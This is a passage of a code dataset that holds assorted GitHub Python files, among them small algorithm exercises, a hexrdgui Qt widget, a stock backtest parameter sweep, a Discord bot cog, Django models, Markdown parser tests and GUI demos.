100\n\n# tries keep count of how many guesses player makes\n\ntries, random_num = 0, random.randint(1, 100)\n\nwhile True:\n\n print('Guess a number in the range of 1-100')\n\n your_guess = int(input())\n\n if your_guess > random_num:\n\n print('{} is greater than the random number X'.\n\n format(your_guess))\n\n tries += 1\n\n elif your_guess < random_num:\n\n print('{} is less than the random number X'.\n\n format(your_guess))\n\n tries += 1\n\n else:\n\n print('Congrats! {} is equal to the random number '\n\n '{}.'.format(your_guess, random_num))\n\n tries += 1\n\n print('It took you {} tries'.format(tries))\n\n break\n","repo_name":"akjalbani/Test_Python","sub_path":"Misc/Loops/guess_a_number.py","file_name":"guess_a_number.py","file_ext":"py","file_size_in_byte":795,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"18"} +{"seq_id":"10644494529","text":"import collections\n\nclass Codec:\n \"\"\"\n 序列化:\n - 用BFS遍历树, 与一般遍历不同点是不管node的左右子节点是否存在,\n 统统加到队列中\n - 在节点出队时, 如果节点不存在, 在返回值res中加入一个\n null;如果节点存在, 则加入节点值的字符串形式\n\n 反序列化:\n - 同样使用BFS方法, 利用队列新建二叉树\n - 首先要将data转换成列表, 然后遍历,只要不为null将节点按顺序加入二叉树中;\n 同时还要将节点入队\n - 队列为空时遍历完毕, 返回根节点\n \"\"\"\n def serialize(self, root):\n \"\"\"Encodes a tree to a single string.\n :type root: TreeNode\n :rtype: str\n \"\"\"\n if not root: return \"\"\n queue = collections.deque([root])\n res = []\n while queue:\n node = queue.popleft()\n if node:\n res.append(str(node.val))\n queue.append(node.left)\n queue.append(node.right)\n else:\n res.append('None')\n return '[' + ','.join(res) + ']'\n\n def deserialize(self, data):\n \"\"\"Decodes your encoded data to tree.\n :type data: str\n :rtype: TreeNode\n \"\"\"\n if not data: return []\n dataList = data[1:-1].split(',')\n root = TreeNode(int(dataList[0]))\n queue = collections.deque([root])\n i = 1\n while queue:\n node = queue.popleft()\n if dataList[i] != 'None':\n node.left = TreeNode(int(dataList[i]))\n queue.append(node.left)\n i += 1\n if dataList[i] != 'None':\n node.right = TreeNode(int(dataList[i]))\n queue.append(node.right)\n i += 1\n return root\n","repo_name":"ShawnDong98/Algorithm-Book","sub_path":"leetcode/python/297.py","file_name":"297.py","file_ext":"py","file_size_in_byte":1834,"program_lang":"python","lang":"zh","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"628567272","text":"import numpy as np\n\nfrom PySide6.QtCore import QItemSelectionModel, QObject, Qt, Signal\nfrom PySide6.QtWidgets import QTableWidgetItem\n\nfrom hexrd.rotations import quatOfExpMap\n\nfrom hexrdgui.create_hedm_instrument import create_hedm_instrument\nfrom hexrdgui.fiber_pick_utils import _angles_from_orientation, _pick_to_fiber\nfrom hexrdgui.ui_loader import UiLoader\nfrom hexrdgui.utils import block_signals\n\n\nclass HandPickedFibersWidget(QObject):\n\n fiber_step_modified = Signal(float)\n\n def __init__(self, data, canvas, ax, parent=None):\n super().__init__(parent)\n\n loader = UiLoader()\n self.ui = loader.load_file('hand_picked_fibers_widget.ui', parent)\n\n self.data = data\n self.canvas = canvas\n self.ax = ax\n\n self._active = True\n\n self.cached_picked_spots = {}\n self.generated = np.empty((0,))\n self.picked = np.empty((0, 3))\n\n self.current_hkl_index = 0\n self.current_spots = np.empty((0,))\n self.last_eta = None\n self.last_ome = None\n self.last_hkl_index = None\n\n self.setup_connections()\n\n def setup_connections(self):\n self.ui.current_slider.valueChanged.connect(\n self.current_slider_value_changed)\n\n 
self.ui.current_angle.valueChanged.connect(\n self.current_angle_value_changed)\n\n self.ui.add_button.clicked.connect(self.add_current)\n\n self.ui.picked_table.selectionModel().selectionChanged.connect(\n self.picked_table_selection_changed)\n\n self.ui.delete_selected.clicked.connect(self.deleted_selected_rows)\n\n self.ui.fiber_step.valueChanged.connect(self.fiber_step_value_changed)\n\n self.canvas.mpl_connect('button_press_event', self.plot_clicked)\n\n def update_gui(self):\n self.ui.current_slider.setRange(0, self.num_picked - 1)\n self.ui.current_angle.setSingleStep(self.fiber_step)\n\n @property\n def active(self):\n return self._active\n\n @active.setter\n def active(self, v):\n if self._active == v:\n return\n\n self._active = v\n\n self.clear_generated()\n self.clear_selected_artists()\n self.select_rows([])\n\n def clear_generated(self):\n # Reset the latest picks to None\n self.last_eta = None\n self.last_ome = None\n self.last_hkl_index = None\n\n self.generated = np.empty((0,))\n self.ui.current_slider.setValue(0)\n # In case the value didn't change. This shouldn't be expensive,\n # so it's okay to run it twice.\n self.update_current()\n\n def plot_clicked(self, event):\n if not self.active:\n # If this widget is inactive, just return\n return\n\n if not event.button == 3:\n # We only hand pick on right-click\n return\n\n self.last_eta = event.xdata\n self.last_ome = event.ydata\n self.last_hkl_index = self.current_hkl_index\n\n self.recreate_generated()\n\n def recreate_generated(self):\n pick_coords = (self.last_eta, self.last_ome)\n if any(x is None for x in pick_coords):\n # No picked coords. Just return.\n return\n\n hkl_index = self.last_hkl_index\n if hkl_index is None or hkl_index >= len(self.data.dataStore):\n # Invalid hkl index. Return.\n return\n\n instr = create_hedm_instrument()\n\n kwargs = {\n 'pick_coords': pick_coords,\n 'eta_ome_maps': self.data,\n 'map_index': hkl_index,\n 'step': self.fiber_step,\n 'beam_vec': instr.beam_vector,\n 'chi': instr.chi,\n 'as_expmap': True,\n }\n self.generated = _pick_to_fiber(**kwargs)\n\n self.ui.current_slider.setValue(0)\n # In case the value didn't change. 
This shouldn't be expensive,\n # so it's okay to run it twice.\n self.update_current()\n\n def update_current(self):\n enable = len(self.generated) > 0\n\n enable_list = [\n self.ui.current_slider,\n self.ui.current_angle,\n self.ui.current_orientation_0,\n self.ui.current_orientation_1,\n self.ui.current_orientation_2,\n self.ui.add_button,\n ]\n for w in enable_list:\n w.setEnabled(enable)\n\n for i, v in enumerate(self.current_orientation):\n w = getattr(self.ui, f'current_orientation_{i}')\n w.setValue(v)\n\n angle = self.current_index * self.fiber_step\n self.ui.current_angle.setValue(angle)\n\n self.generate_current_spots()\n self.update_current_plot()\n\n def generate_current_spots(self):\n if self.current_index >= len(self.generated):\n fibers = []\n else:\n fibers = self.generated[self.current_index]\n\n self.current_spots = self.general_spots(fibers)\n\n def general_spots(self, fibers):\n if len(fibers) == 0:\n return np.empty((0,))\n\n kwargs = {\n 'instr': create_hedm_instrument(),\n 'eta_ome_maps': self.data,\n 'orientation': fibers,\n }\n return _angles_from_orientation(**kwargs)\n\n def clear_current_plot(self):\n if hasattr(self, '_current_lines'):\n self._current_lines.remove()\n del self._current_lines\n\n def update_current_plot(self):\n self.clear_current_plot()\n hkl_idx = self.current_hkl_index\n if len(self.current_spots) <= hkl_idx:\n self.draw()\n return\n\n current = self.current_spots[hkl_idx]\n if current.size:\n kwargs = {\n 'x': current[:, 0],\n 'y': current[:, 1],\n 's': 36,\n 'c': 'm',\n 'marker': '+',\n }\n self._current_lines = self.ax.scatter(**kwargs)\n\n self.draw()\n\n @property\n def current_orientation(self):\n if len(self.generated) == 0:\n return np.array([0, 0, 0])\n\n return self.generated[self.current_index]\n\n @property\n def current_index(self):\n return self.ui.current_slider.value()\n\n def current_slider_value_changed(self):\n self.update_current()\n\n def current_angle_value_changed(self, v):\n new_slider_index = round(v / self.fiber_step)\n self.ui.current_slider.setValue(new_slider_index)\n\n # This usually already happens, but make sure the angle gets\n # updated to its new value (it may need to round to the nearest).\n angle = self.current_index * self.fiber_step\n self.ui.current_angle.setValue(angle)\n\n def add_current(self):\n to_stack = (self.picked, self.current_orientation)\n self.picked = np.vstack(to_stack)\n self.update_picked_table()\n\n self.clear_generated()\n\n table = self.ui.picked_table\n last_row = table.rowCount() - 1\n self.select_rows([last_row])\n\n def update_picked_table(self):\n table = self.ui.picked_table\n table.clearContents()\n table.setColumnCount(3)\n table.setRowCount(len(self.picked))\n for i, orientation in enumerate(self.picked):\n for j in range(3):\n item = QTableWidgetItem(f'{orientation[j]:.4f}')\n item.setTextAlignment(Qt.AlignCenter)\n item.setFlags(item.flags() & ~Qt.ItemIsEditable)\n table.setItem(i, j, item)\n\n @property\n def picked_quaternions(self):\n # We store these as 3D exp maps. Convert and return as quaternions.\n quats = quatOfExpMap(self.picked.T)\n if quats.ndim == 1:\n # quatOfExpMap() squeezes the output. 
We must reshape it.\n quats = np.atleast_2d(quats).T\n\n return quats\n\n @property\n def picked(self):\n return self._picked\n\n @picked.setter\n def picked(self, v):\n self._picked = v\n # Clear the cache for hand picked spots\n self.cached_picked_spots.clear()\n\n def clear_selected_artists(self):\n lines = getattr(self, '_selected_artists', [])\n while lines:\n lines.pop(0).remove()\n\n @property\n def selected_rows(self):\n selected = self.ui.picked_table.selectionModel().selectedRows()\n selected = [] if None else selected\n return [x.row() for x in selected]\n\n def picked_table_selection_changed(self):\n self.draw_selected()\n\n enable_delete = len(self.selected_rows) > 0\n self.ui.delete_selected.setEnabled(enable_delete)\n\n def spots_for_hand_picked_quaternion(self, i):\n if i >= len(self.picked):\n return None\n\n cache = self.cached_picked_spots\n\n # Check the cache first. If not present, add to the cache.\n if i not in cache:\n fiber = self.picked[i]\n if not fiber.size:\n return None\n\n cache[i] = self.general_spots(fiber)\n\n return cache[i][self.current_hkl_index]\n\n def draw_selected(self):\n self.clear_selected_artists()\n\n artists = []\n for i in self.selected_rows:\n spots = self.spots_for_hand_picked_quaternion(i)\n if spots is None or spots.size == 0:\n continue\n\n kwargs = {\n 'x': spots[:, 0],\n 'y': spots[:, 1],\n 's': 36,\n 'marker': 'o',\n 'facecolors': 'none',\n 'edgecolors': 'c',\n 'linewidths': 1,\n }\n artists.append(self.ax.scatter(**kwargs))\n\n self._selected_artists = artists\n self.draw()\n\n def select_rows(self, rows):\n table = self.ui.picked_table\n selection_model = table.selectionModel()\n\n with block_signals(selection_model):\n selection_model.clearSelection()\n command = QItemSelectionModel.Select | QItemSelectionModel.Rows\n\n for i in rows:\n if i is None or i >= table.rowCount():\n # Out of range. 
Don't do anything.\n continue\n\n # Select the row\n model_index = selection_model.model().index(i, 0)\n selection_model.select(model_index, command)\n\n self.picked_table_selection_changed()\n\n def deleted_selected_rows(self):\n self.picked = np.delete(self.picked, self.selected_rows, 0)\n # There should be no selection now\n self.select_rows([])\n self.update_picked_table()\n\n def fiber_step_value_changed(self, v):\n prev_angle = self.ui.current_angle.value()\n\n self.ui.current_slider.setRange(0, self.num_picked - 1)\n self.ui.current_angle.setSingleStep(self.fiber_step)\n\n if self.active:\n # Re-create the generated fibers\n # Restore the closest value to the previous angle\n self.recreate_generated()\n self.ui.current_angle.setValue(prev_angle)\n\n self.fiber_step_modified.emit(v)\n\n @property\n def fiber_step(self):\n return self.ui.fiber_step.value()\n\n @fiber_step.setter\n def fiber_step(self, v):\n self.ui.fiber_step.setValue(v)\n\n @property\n def num_picked(self):\n return round(360 / self.fiber_step)\n\n def draw(self):\n self.canvas.draw()\n","repo_name":"HEXRD/hexrdgui","sub_path":"hexrdgui/hand_picked_fibers_widget.py","file_name":"hand_picked_fibers_widget.py","file_ext":"py","file_size_in_byte":11286,"program_lang":"python","lang":"en","doc_type":"code","stars":22,"dataset":"github-code","pt":"18"} +{"seq_id":"18193056698","text":"# 기존 풀이\n# def solution(cards1, cards2, goal):\n# answer = ''\n# n1 = 0\n# n2 = 0\n# for i in goal:\n# if i == cards1[n1]:\n# if n1 < len(cards1)-1:\n# n1 += 1\n# elif i == cards2[n2]:\n# if n2 < len(cards2)-1:\n# n2 += 1\n# else:\n# answer = 'No'\n# break\n# # print(n1, n2)\n# answer = 'Yes'\n# return answer\n\n\n# pop 사용\ndef solution(cards1, cards2, goal):\n for i in goal:\n if len(cards1) > 0 and i == cards1[0]:\n cards1.pop(0) \n elif len(cards2) >0 and i == cards2[0]:\n cards2.pop(0)\n else:\n return \"No\"\n # print(cards1, cards2, i)\n return \"Yes\"\n","repo_name":"SoominRyu/Algorithm","sub_path":"프로그래머스/unrated/159994. 
카드 뭉치/카드 뭉치.py","file_name":"카드 뭉치.py","file_ext":"py","file_size_in_byte":756,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"74279783402","text":"\"\"\"\nSend a request to a URL, display response body, and handle error codes.\n\nThis script takes a URL as input, sends a request to the URL, displays the body of\nthe response, and prints an error code if the HTTP status code is greater than or\nequal to 400.\n\nUsage:\n python script.py \n\nArgs:\n URL (str): The URL to send the request to.\n\nExample:\n python script.py http://0.0.0.0:5000\n\"\"\"\n\nimport requests\nimport sys\n\n\ndef main():\n url = sys.argv[1]\n \n response = requests.get(url)\n responsebody = response.text\n \n if response.status_code > 400:\n print(\"Error code: {}\".format(response.status_code))\n else:\n print(responsebody)\nif __name__==\"__main__\":\n main()\n\n ","repo_name":"NormanDee510/alx_python","sub_path":"python-network_1/4-error_code.py","file_name":"4-error_code.py","file_ext":"py","file_size_in_byte":719,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"36099423756","text":"# -*- coding: utf-8 -*-\n\"\"\"\n\n# 根据参数寻优,画出热力图,找出最稳定的参数;\n# 首先参数寻优的rsrs策略\n\nMon 2018/09/03\n\n@author: Tracy Zhu\n\"\"\"\n\nimport sys\n\n# 导入用户库\nsys.path.append(\"..\")\nfrom techiniacl_analysis_stock.rsrs_research import *\n\n\nstart_date = '2008-01-01'\nend_date = '2018-11-12'\nS = 0.7\ncontext = Context(start_date, end_date, S)\nN_list = range(10, 40)\nM_list = range(100, 400, 20)\ndata = get_index_data(\"000905.SH\", start_date, end_date)\ndata = data[['time', 'code', 'open', 'high', 'low', 'close']]\ndata.rename(columns={'time': 'tradeday', 'code': 'sec_code', 'open': 'open_slice', 'high': 'high_slice',\n 'low': 'low_slice', 'close': 'close_slice'}, inplace=True)\ndata['trade_dir'] = -1\n\nreturn_dict = dict()\nsharpe_dict = dict()\ndrawback_dict = dict()\nfor N in N_list:\n for M in M_list:\n print(M, N)\n data_ind = RSRS(data, N, M, S=0.7, ndays=5)\n data_ind = data_ind[data_ind.sec_code == '000905.SH']\n indicator_series = Series(data_ind['rsrs_std_cor_right'].values, index=data_ind.tradeday)\n indicator_series = indicator_series.dropna()\n context = Context(start_date, end_date, S)\n holding_cumprod_pct, index_cumprod_pct, total_fee = back_test_by_indicator(indicator_series, context)\n annulized_return, sharpe_ratio, max_drowback = calc_evaluation_index(holding_cumprod_pct)\n return_dict[N, M] = annulized_return\n sharpe_dict[N, M] = sharpe_ratio\n drawback_dict[N, M] = max_drowback\n\n\ndef convert_dict_df(temp_dict):\n \"将上述变成的dict转化成df\"\n res_df = pd.DataFrame(temp_dict, index=[0]).T.reset_index()\n res_df.columns = ['N', 'M', 'return']\n res_mat = res_df.set_index(['N', 'M'])['return'].unstack()\n res_mat = res_mat.T\n return res_mat\n\nres_mat = convert_dict_df(return_dict)\ndrawback_mat = convert_dict_df(drawback_dict)\nsharpe_mat = convert_dict_df(sharpe_dict)\ncmap = sns.color_palette(\"RdBu_r\", 40)\nfig = plt.figure(figsize=(12, 8))\nax2 = plt.subplot(111)\nsns.heatmap(res_mat, yticklabels=True, annot=True, cmap=cmap, linecolor='black', linewidths=0.05, ax=ax2, cbar=True)\n# ax2.set_title(ths_time)\nplt.yticks(rotation=0)\n#\nplt.savefig('./plot1/' + 
'heatmap_try22.png')","repo_name":"tracy-zhu/pratice_project","sub_path":"stock_backtest/parameter_optimization.py","file_name":"parameter_optimization.py","file_ext":"py","file_size_in_byte":2261,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"19"} +{"seq_id":"36875999857","text":"import logging\n\nfrom discord import ApplicationContext, Embed, Interaction, Message, WebhookMessage, slash_command\nfrom discord.ext import commands\n\nfrom src.bot import Bot\nfrom src.core import settings\n\nlogger = logging.getLogger(__name__)\n\n\nclass OtherCog(commands.Cog):\n \"\"\"Ban related commands.\"\"\"\n\n def __init__(self, bot: Bot):\n self.bot = bot\n\n @slash_command(guild_ids=settings.guild_ids, description=\"A simple reply stating hints are not allowed.\")\n async def no_hints(\n self, ctx: ApplicationContext\n ) -> Message:\n \"\"\"A simple reply stating hints are not allowed.\"\"\"\n return await ctx.respond(\n \"No hints are allowed for the duration the event is going on. This is a competitive event with prizes. \"\n \"Once the event is over you are more then welcome to share solutions/write-ups/etc and try them in the \"\n \"After Party event.\"\n )\n @slash_command(guild_ids=settings.guild_ids, description=\"A simple reply proving a link to the support desk article on how to get support\")\n @commands.cooldown(1, 60, commands.BucketType.user)\n async def support(\n self, ctx: ApplicationContext\n ) -> Message:\n \"\"\"A simple reply proving a link to the support desk article on how to get support\"\"\"\n return await ctx.respond(\n \"https://help.hackthebox.com/en/articles/5986762-contacting-htb-support\"\n )\n @slash_command(guild_ids=settings.guild_ids, description=\"Add the URL which has spoiler link.\")\n async def spoiler(self, ctx: ApplicationContext, url: str) -> Interaction | WebhookMessage:\n \"\"\"Add the URL which has spoiler link.\"\"\"\n if len(url) == 0:\n return await ctx.respond(\"Please provide the spoiler URL.\")\n\n embed = Embed(title=\"Spoiler Report\", color=0xB98700)\n embed.add_field(name=f\"{ctx.user} has submitted a spoiler.\", value=f\"URL: <{url}>\", inline=False)\n\n channel = self.bot.get_channel(settings.channels.SPOILER)\n await channel.send(embed=embed)\n return await ctx.respond(\"Thanks for the reporting the spoiler.\", ephemeral=True, delete_after=15)\n\n\ndef setup(bot: Bot) -> None:\n \"\"\"Load the `ChannelManageCog` cog.\"\"\"\n bot.add_cog(OtherCog(bot))\n","repo_name":"hackthebox/Hackster","sub_path":"src/cmds/core/other.py","file_name":"other.py","file_ext":"py","file_size_in_byte":2259,"program_lang":"python","lang":"en","doc_type":"code","stars":50,"dataset":"github-code","pt":"19"} +{"seq_id":"9387868938","text":"def get_sp500():\n f = open('sp500.txt','r')\n\n lines = f.readlines()\n\n f.close()\n\n syms = list()\n for line in lines[1:]: \n line = line.replace('\\t',' ')\n sym = line.split(' ')\n syms.append(sym[0])\n\n return syms\n","repo_name":"benjiqq/Polymarkets","sub_path":"manage/fetch/sp.py","file_name":"sp.py","file_ext":"py","file_size_in_byte":252,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"19"} +{"seq_id":"1358181448","text":"import re\nimport mistune\nfrom mistune.util import html\nfrom tests import BaseTestCase\nIGNORE_CASES = {'setext_headings_002', 'setext_headings_015',\n 'setext_headings_003', 'setext_headings_007', 'setext_headings_013',\n 'html_blocks_039', 'link_reference_definitions_019', 'block_quotes_008',\n 
'list_items_005', 'list_items_024', 'list_items_028', 'list_items_039',\n 'list_items_040', 'list_items_041', 'lists_007', 'lists_016',\n 'lists_017', 'lists_018', 'lists_019', 'block_quotes_005',\n 'block_quotes_006', 'block_quotes_011', 'block_quotes_020',\n 'block_quotes_023', 'block_quotes_024', 'code_spans_009',\n 'code_spans_010', 'entity_and_numeric_character_references_004',\n 'entity_and_numeric_character_references_005', 'links_029', 'links_031',\n 'links_034', 'links_037', 'links_038', 'links_039', 'links_043',\n 'links_045', 'links_046', 'links_047', 'links_049', 'links_050',\n 'links_051', 'links_064', 'links_065', 'links_077', 'images_002',\n 'images_003', 'images_004', 'images_005', 'images_006', 'images_014',\n 'images_018', 'autolinks_002'}\nINSANE_CASES = {'fenced_code_blocks_013', 'fenced_code_blocks_015',\n 'list_items_033', 'list_items_038', 'link_reference_definitions_002',\n 'link_reference_definitions_003', 'link_reference_definitions_004',\n 'link_reference_definitions_005', 'link_reference_definitions_007',\n 'link_reference_definitions_021', 'links_025', 'links_032', 'links_033',\n 'links_041', 'links_060', 'links_082', 'links_084'}\nif html is None:\n PY2_IGNORES = {'entity_and_numeric_character_references_001',\n 'entity_and_numeric_character_references_002',\n 'entity_and_numeric_character_references_003',\n 'entity_and_numeric_character_references_008',\n 'entity_and_numeric_character_references_009',\n 'entity_and_numeric_character_references_010', 'links_016', 'links_019'\n }\nelse:\n PY2_IGNORES = []\nDIFFERENCES = {'tabs_005': lambda s: s.replace(' ', ''),\n 'tabs_006': lambda s: s.replace(' ', ''), 'tabs_007': lambda\n s: s.replace(' ', '')}\nPASSED = {'tabs', 'thematic', 'atx', 'setext', 'indented', 'fenced',\n 'html_blocks', 'link_ref', 'paragraphs', 'blank_lines', 'block_quotes',\n 'list_items', 'lists', 'backslash', 'entity', 'code_spans', 'links',\n 'images', 'autolinks', 'raw_html', 'hard_line', 'soft_line', 'textual'}\n\n\nclass TestCommonMark(BaseTestCase):\n\n @classmethod\n def ignore_case(cls, n):\n if n.startswith('emphasis'):\n return True\n if PY2_IGNORES and n in PY2_IGNORES:\n return True\n return n in IGNORE_CASES or n in INSANE_CASES\n\n def assert_case(self, n, text, html):\n result = mistune.html(text)\n result = re.sub('\\\\s*\\\\n+\\\\s*', '\\n', result)\n result = re.sub('>\\\\n', '>', result)\n result = re.sub('\\\\n<', '<', result)\n expect = re.sub('\\\\s*\\\\n+\\\\s*', '\\n', html)\n expect = re.sub('>\\\\n', '>', expect)\n expect = re.sub('\\\\n<', '<', expect)\n if n in DIFFERENCES:\n expect = DIFFERENCES[n](expect)\n self.assertEqual(result, expect)\n\n\nTestCommonMark.load_fixtures('commonmark.txt')\n","repo_name":"SchoofsEbert/AmPyfier_evaluation","sub_path":"mistune/test_commonmark_ampyfier.py","file_name":"test_commonmark_ampyfier.py","file_ext":"py","file_size_in_byte":3210,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"20594486953","text":"import keyboard\r\nimport time\r\nimport pyfiglet\r\n\r\ndef Main():\r\n Title = pyfiglet.figlet_format(\"Demins autosend\")\r\n\r\n print(f\"{Title}\")\r\n Message = str(input(\"What would you like to send? \"))\r\n \r\n while True:\r\n Delay = input(\"Delay in seconds? 
\")\r\n \r\n try:\r\n Delay = int(Delay)\r\n break\r\n except ValueError:\r\n print(\"The delay is not a valid integer.\")\r\n \r\n def AutoSend():\r\n print(\"\\nStarting script in 3s...\")\r\n time.sleep(3)\r\n print(\"Running\")\r\n while True:\r\n keyboard.write(Message)\r\n keyboard.send(\"enter\")\r\n print(\"Typed message\")\r\n time.sleep(Delay)\r\n \r\n Start = input(\"\\nWould you like to start the script..? (Y/N) \")\r\n if Start.lower() == \"y\":\r\n AutoSend()\r\n else:\r\n return\r\n \r\nMain()","repo_name":"DemonMan123/AutoSend","sub_path":"Bot.py","file_name":"Bot.py","file_ext":"py","file_size_in_byte":874,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"42790212433","text":"from django.conf import settings\nfrom django.db import models\nfrom django_extensions.db.fields import UUIDField\n\n\nclass Tenant(models.Model):\n \"\"\"Information about the tenants in Goldstone.\n\n If storing tenant settings here becomes unwieldy, we'll normalize them into\n a separate table.\n\n \"\"\"\n\n name = models.CharField(max_length=settings.TENANT_NAME_MAX_LENGTH,\n unique=True)\n owner = models.CharField(max_length=settings.TENANT_OWNER_MAX_LENGTH,\n help_text=\"The name of the tenant's owner\")\n owner_contact = \\\n models.TextField(blank=True,\n help_text=\"The owner's contact information\")\n\n # This allows URLs to identify a row using a UUID value.\n uuid = UUIDField(auto=True)\n\n def __unicode__(self):\n \"\"\"Return a useful string.\"\"\"\n\n return u'%s owned by %s' % (self.name, self.owner)\n\n\nclass Cloud(models.Model):\n \"\"\"Information about the clouds, e.g., OpenStack, which are owned by\n Goldstone tenants.\"\"\"\n\n # This is the cloud's name, not the name of the owning Goldstone tenant!\n tenant_name = models.CharField(max_length=settings.OS_NAME_MAX_LENGTH)\n username = models.CharField(max_length=settings.OS_USERNAME_MAX_LENGTH)\n password = models.CharField(max_length=settings.OS_PASSWORD_MAX_LENGTH)\n auth_url = models.CharField(max_length=settings.OS_AUTH_URL_MAX_LENGTH)\n\n # A Goldstone tenant may have multiple clouds.\n tenant = models.ForeignKey(Tenant)\n\n # This allows URLs to identify a row using a UUID value.\n uuid = UUIDField(auto=True)\n\n class Meta: # pylint: disable=C1001,C0111,W0232\n unique_together = (\"tenant_name\", \"username\", \"tenant\")\n\n def __unicode__(self):\n \"\"\"Return a useful string.\"\"\"\n\n return u'%s, contained in %s' % (self.tenant_name, self.tenant.name)\n","repo_name":"Solinea/goldstone-server","sub_path":"goldstone/tenants/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":1882,"program_lang":"python","lang":"en","doc_type":"code","stars":12,"dataset":"github-code","pt":"19"} +{"seq_id":"20860745843","text":"from django.conf.urls import url, include\nfrom views import post_list,post_create,post_delete,post_detail,post_update\n\nurlpatterns=[\n\n # post-list\n url(r'^$',post_list,name=\"post-list\"),\n # post-create\n url(r'^create/$',post_create,name=\"post-create\"),\n #post-detail\n url(r'^(?P[\\w-]+)/$',post_detail,name=\"post-detail\"),\n #post-delete\n url(r'^(?P[\\w-]+)/delete/$',post_delete,name=\"post-delete\"),\n #post-update\n url(r'^(?P[\\w-]+)/edit/$',post_update,name=\"post-update\"),\n\n\n]","repo_name":"strar-buck/my-blog","sub_path":"posts/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":523,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} 
+{"seq_id":"39864565738","text":"import jax\nimport jax.tree_util as tree\nimport jax.numpy as jnp\nimport haiku as hk\n\nclass DynamicHypernetwork(hk.Module):\n \"\"\"\n Hypernetwork that takes the current batch as inputs, averages the samples, and then uses that average to predict weights for the layer.\n\n This will be modified soon such that it contains a dynamic hypernet for a single input\n that is then vmapped over the batch axis.\n \"\"\"\n\n def __init__(self, embedding_dim, latent_dim, network_params):\n super().__init__()\n # PyTree data needed to reconstruct net\n self.tgt_treedef = tree.tree_structure(network_params)\n self.tgt_sizes = tree.tree_map(jnp.size, network_params)\n self.num_tgt_layers = len(tree.tree_leaves(network_params))\n self.target_layer_shapes = tree.tree_map(jnp.shape, network_params)\n \n # hypernetwork dimensions\n self.embedding_dim = embedding_dim\n self.latent_dim = latent_dim\n \n def __call__(self, x):\n avg = jnp.mean(x, axis=0)\n layer_inputs = jnp.repeat(jnp.expand_dims(avg, 0), self.num_tgt_layers, 0)\n projections = hk.nets.MLP([self.embedding_dim, self.latent_dim, self.latent_dim])(layer_inputs)\n\n layer_projections = jnp.split(projections, self.num_tgt_layers)\n \n rebuilt_tree = tree.tree_unflatten(self.tgt_treedef, layer_projections)\n resized_tree = tree.tree_map(lambda layer, size: jnp.pad(layer[1,:size], \n (0,max(0,size-layer.size)), \n mode=\"wrap\"), \n rebuilt_tree, \n self.tgt_sizes\n )\n net = tree.tree_map(jnp.reshape, resized_tree, self.target_layer_shapes)\n return net","repo_name":"kmheckel/synecdoche","sub_path":"synecdoche/experimental.py","file_name":"experimental.py","file_ext":"py","file_size_in_byte":1878,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"19"} +{"seq_id":"70974201963","text":"\nclass IntervalNode(object):\n\tdef __init__(self, lo, hi):\n\t\tself.lo = lo\n\t\tself.hi = hi\n\t\tself.max = hi\n\t\tself.left = None\n\t\tself.right = None\n\n\tdef __str__(self):\n\t\treturn \"Node({}, {}, {})\".format(self.lo, self.hi, self.max)\n\nclass IntervalTree(object):\n\tdef __init__(self):\n\t\tself.root = None\n\n\tdef insert(self, lo, hi):\n\t\tif self.root is None:\n\t\t\tself.root = IntervalNode(lo, hi)\n\t\t\treturn self.root\n\n\t\tself.insert_helper(self.root, lo, hi)\n\n\tdef insert_helper(self, node, lo, hi):\n\t\tif node is None:\n\t\t\treturn IntervalNode(lo, hi)\n\n\t\tif lo < node.lo:\n\t\t\tnode.left = self.insert_helper(node.left, lo, hi)\n\t\telse:\n\t\t\tnode.right = self.insert_helper(node.right, lo, hi)\n\n\t\tnode.max = max(node.hi, hi)\n\t\treturn node\n\n\tdef is_overlap(self, lo, hi):\n\t\treturn self.is_overlap_helper(self.root, lo, hi)\n\n\tdef is_overlap_helper(self, node, lo, hi):\n\t\tif node is None:\n\t\t\treturn None\n\n\t\tif lo < node.hi and node.lo < hi:\n\t\t\treturn node\n\n\t\tif node.left and node.left.max > lo:\n\t\t\treturn self.is_overlap_helper(node.left, lo, hi)\n\t\telse:\n\t\t\treturn self.is_overlap_helper(node.right, lo, hi)\n\nif __name__ == '__main__':\n\tit = IntervalTree()\n\tit.insert(10, 15)\n\tit.insert(11, 13)\n\tit.insert(18, 21)\n\tit.insert(20, 25)\n\tit.insert(0, 7)\n\n\tprint(it.is_overlap(8, 9))\n\tprint(it.is_overlap(17, 17))\n\tprint(it.is_overlap(21, 22))\n\tprint(it.is_overlap(21, 22))\n\tprint(it.is_overlap(12, 18))\n\tprint(it.is_overlap(24, 
26))\n\n","repo_name":"kanghuawu/Algorithm","sub_path":"python/tree/interval_tree.py","file_name":"interval_tree.py","file_ext":"py","file_size_in_byte":1406,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"19"} +{"seq_id":"18307852621","text":"#!/usr/bin/env python3\n\nimport pyglet\nimport glooey\nimport run_demos\n\nwindow = pyglet.window.Window()\ngui = glooey.Gui(window)\nbin = glooey.Bin()\nwidget = glooey.Placeholder(100, 100)\n\nbin.add(widget)\ngui.add(bin)\n\n@run_demos.on_space(gui) \ndef test_bin():\n bin.add(widget)\n yield \"Put a widget in the bin.\"\n bin.clear()\n yield \"Clear the bin.\"\n\n\npyglet.app.run()\n\n\n","repo_name":"MichaelSinsbeck/glooey","sub_path":"tests/containers/demo_bin.py","file_name":"demo_bin.py","file_ext":"py","file_size_in_byte":378,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"19"} +{"seq_id":"20386305237","text":"from utils import *\nimport numpy as np\nimport pandas as pd\nimport joblib\n'''\ntrain_xy.Date = 